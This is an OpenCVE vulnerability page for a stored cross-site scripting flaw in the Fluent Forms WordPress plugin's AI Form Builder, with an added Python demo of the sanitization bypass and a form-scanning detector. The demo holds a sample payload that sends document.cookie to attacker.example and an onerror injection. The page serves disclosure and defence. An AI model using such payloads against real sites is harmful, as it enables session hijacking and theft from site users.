Description
The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI Form Builder module in all versions up to, and including, 6.1.14 due to a combination of missing authorization checks, a leaked nonce, and insufficient input sanitization. The vulnerability allows Subscriber-level users to trigger AI form generation via a protected endpoint. When prompted, AI services will typically return bare JavaScript code (without <script> tags), which bypasses the plugin's sanitization. This stored JavaScript executes whenever anyone views the generated form, making it possible for authenticated attackers with Subscriber-level access and above to inject arbitrary web scripts that will execute in the context of any user accessing the form.
Published: 2026-02-10
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored XSS
Action: Apply Patch
AI Analysis

Impact

The Fluent Forms plugin for WordPress contains a stored cross-site scripting flaw in its AI Form Builder module. Three weaknesses combine: the AI form-generation endpoint does not check the caller's capabilities, the nonce that is supposed to protect it is exposed to low-privileged users, and the sanitization applied to the AI response looks for <script> tags, which the bare JavaScript an AI service typically returns does not contain. An authenticated user with the Subscriber role or higher can therefore have the plugin store attacker-directed JavaScript inside a form definition; that script then runs in the browser of every user who views the form.

Affected Systems

All installations of techjewel's Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin up to and including version 6.1.14 are affected. Any WordPress site running the plugin and holding accounts at the Subscriber level or above (including sites with open user registration) is exposed, since a Subscriber account is all the attacker needs.

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) indicates medium severity; the changed scope reflects that the injected script executes in other users' browsers rather than on the vulnerable component itself. The EPSS score below 1% suggests a very low current likelihood of exploitation, and the vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog. The attacker needs only an authenticated account at the Subscriber level or higher and no interaction from the victim beyond viewing the form. Once injected, the JavaScript runs for every user who views the compromised form, which can lead to session hijacking, data theft, or defacement; an administrator viewing the form is the most valuable target because the script runs with that user's session.

Generated by OpenCVE AI on April 16, 2026 at 06:57 UTC.

Remediation

No vendor fix or workaround is recorded on this page. The advisory's affected range ends at 6.1.14, so a release newer than that is the version to look for; confirm against the vendor's changelog before relying on it.

OpenCVE Recommended Actions

  • Update Fluent Forms to a release newer than 6.1.14 as soon as one is available (the advisory's affected range ends at 6.1.14)
  • Until then, disable the AI Form Builder feature so the form-generation endpoint cannot be reached
  • Audit existing form definitions, above all AI-generated ones, for embedded JavaScript; look for bare script fragments as well as <script> tags, since bare fragments are what bypassed the sanitization, and remove anything not authored by a trusted administrator
  • Review role permissions and user-registration settings so that only trusted users hold accounts; any Subscriber-level account is sufficient to reach the AI form endpoint

Generated by OpenCVE AI on April 16, 2026 at 06:57 UTC.
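
The sanitization bypass described above and the form-audit step in the recommended actions are illustrated by the following Python example. It is an added illustration and not Fluent Forms code: the form-definition layout (a dict with title, custom_js and fields keys), the AI response string and the three stored forms are constructed for the demo, and the BARE_JS_PATTERNS heuristics are an assumption about what injected code looks like, not the plugin's own filter. The example shows that a sanitizer which only removes <script> elements leaves bare JavaScript untouched, that HTML-escaping the AI output before rendering makes it inert, and how to sweep stored definitions for executable fragments; the third sample form carries an inline event handler, a related injection the sweep also catches.

```python
"""Added example (not Fluent Forms code): why stripping <script> tags is not
XSS sanitization, plus a sweep of stored form definitions for bare JavaScript.
The form layout, AI response and sample forms below are constructed for the demo."""
import html
import re

# Weak sanitizer modelled on the bypassed behaviour: it only removes <script> elements.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def strip_script_tags(text: str) -> str:
    """Remove <script>...</script> blocks and nothing else."""
    return SCRIPT_TAG_RE.sub("", text)


def safe_for_output(ai_output: str) -> str:
    """Treat AI output as data: HTML-escape it before it reaches a page."""
    return html.escape(ai_output, quote=True)


# Heuristics (assumed, not the plugin's filter) for executable content that
# survives tag stripping: DOM access, network calls, inline handlers, URL schemes.
BARE_JS_PATTERNS = {
    "dom_access": re.compile(r"\bdocument\.(cookie|location|write)\b"),
    "call": re.compile(r"\b(fetch|eval|setTimeout|setInterval)\s*\("),
    "window": re.compile(r"\bwindow\.(location|open)\b"),
    "image_beacon": re.compile(r"\bnew\s+Image\s*\("),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "js_url": re.compile(r"javascript\s*:", re.IGNORECASE),
    "script_tag": re.compile(r"<script\b", re.IGNORECASE),
}


def looks_executable(value: str) -> list[str]:
    """Names of the heuristics that match; an empty list means nothing suspicious."""
    return [name for name, pat in BARE_JS_PATTERNS.items() if pat.search(value)]


def _strings(node, path=""):
    """Yield (path, string) for every string inside a nested dict/list structure."""
    if isinstance(node, dict):
        for key, val in node.items():
            yield from _strings(val, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for idx, val in enumerate(node):
            yield from _strings(val, f"{path}[{idx}]")
    elif isinstance(node, str):
        yield path, node


def scan_forms(forms: list[dict]) -> list[dict]:
    """Flag every string in the stored form definitions that looks executable."""
    findings = []
    for form in forms:
        for path, value in _strings(form):
            hits = looks_executable(value)
            if hits:
                findings.append({"form_id": form.get("id"), "path": path, "patterns": hits})
    return findings


# Constructed sample: a bare-JS response of the kind an AI service returns
# (no <script> tags), and three stored forms, two of them carrying injected code.
AI_RESPONSE = "new Image().src='https://attacker.example/?c='+document.cookie;"
SAMPLE_FORMS = [
    {"id": 1, "title": "Contact", "custom_js": "",
     "fields": [{"label": "Name", "placeholder": "Your name"}]},
    {"id": 2, "title": "AI generated", "custom_js": AI_RESPONSE,
     "fields": [{"label": "Email", "placeholder": "you@example.com"}]},
    {"id": 3, "title": "Survey", "custom_js": "",
     "fields": [{"label": "<img src=x onerror=alert(1)>", "placeholder": ""}]},
]

if __name__ == "__main__":
    # The weak sanitizer passes the bare JS through unchanged ...
    print("after strip_script_tags :", strip_script_tags(AI_RESPONSE))
    # ... while escaping turns it into inert text.
    print("after safe_for_output   :", safe_for_output(AI_RESPONSE))
    for finding in scan_forms(SAMPLE_FORMS):
        print("injected:", finding)
```

Run the script directly to see the three results. The heuristics are deliberately broad: a sweep like this produces candidates for manual review and is no substitute for the server-side fix, which is to require an appropriate capability on the generation endpoint and to escape the AI response on output instead of trying to strip tags from it.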

Advisories

No advisories yet.

History

Tue, 10 Feb 2026 16:15:00 +0000

Type             Values Removed   Values Added
Metrics (ssvc)                    {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 10 Feb 2026 12:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Techjewel
                                      Techjewel fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder
                                      Wordpress
                                      Wordpress wordpress
Vendors & Products                    Techjewel
                                      Techjewel fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder
                                      Wordpress
                                      Wordpress wordpress

Tue, 10 Feb 2026 06:00:00 +0000

Type                 Values Removed   Values Added
Description                           The Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI Form Builder module in all versions up to, and including, 6.1.14 due to a combination of missing authorization checks, a leaked nonce, and insufficient input sanitization. The vulnerability allows Subscriber-level users to trigger AI form generation via a protected endpoint. When prompted, AI services will typically return bare JavaScript code (without <script> tags), which bypasses the plugin's sanitization. This stored JavaScript executes whenever anyone views the generated form, making it possible for authenticated attackers with Subscriber-level access and above to inject arbitrary web scripts that will execute in the context of any user accessing the form.
Title                                 Fluent Forms <= 6.1.14 - Authenticated (Subscriber+) Stored Cross-Site Scripting via AI Form Builder Module
Weaknesses                            CWE-79
References
Metrics (cvssV3_1)                    {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}


Subscriptions

Techjewel Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder
Wordpress Wordpress
MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:32:17.369Z

Reserved: 2026-01-15T15:42:36.325Z

Link: CVE-2026-0996

Vulnrichment

Updated: 2026-02-10T15:40:49.973Z

NVD

Status: Deferred

Published: 2026-02-10T06:15:54.320

Modified: 2026-04-15T00:35:42.020

Link: CVE-2026-0996

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T07:00:10Z

Weaknesses